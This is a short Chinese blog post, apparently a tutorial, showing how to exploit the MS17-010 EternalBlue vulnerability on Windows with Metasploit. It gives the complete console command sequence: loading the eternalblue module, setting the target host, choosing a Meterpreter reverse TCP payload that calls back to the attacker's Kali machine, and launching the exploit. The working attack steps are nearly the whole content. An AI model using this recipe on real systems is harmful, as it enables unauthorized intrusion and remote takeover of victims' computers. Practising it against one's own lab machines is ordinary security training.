zoukankan      html  css  js  c++  java
  • metasploit(MSF)对windows的ms17-010漏洞利用

    picture

    配置exploit

    msf > use exploit/windows/smb/ms17_010_eternalblue
    
    msf exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.137.139

    配置payload

    msf exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
    
    msf exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.137.135
    
    msf exploit(windows/smb/ms17_010_eternalblue) > exploit
    

    rhost:目标机

    lhost:kali机

  • 相关阅读:
    rpc
    route
    ROLLBACK
    rmdir -删除空目录
    rm
    rlogin
    REVOKE
    resolver
    RESET
    repquota
  • 原文地址:https://www.cnblogs.com/chenglee/p/9114988.html
Copyright © 2011-2022 走看看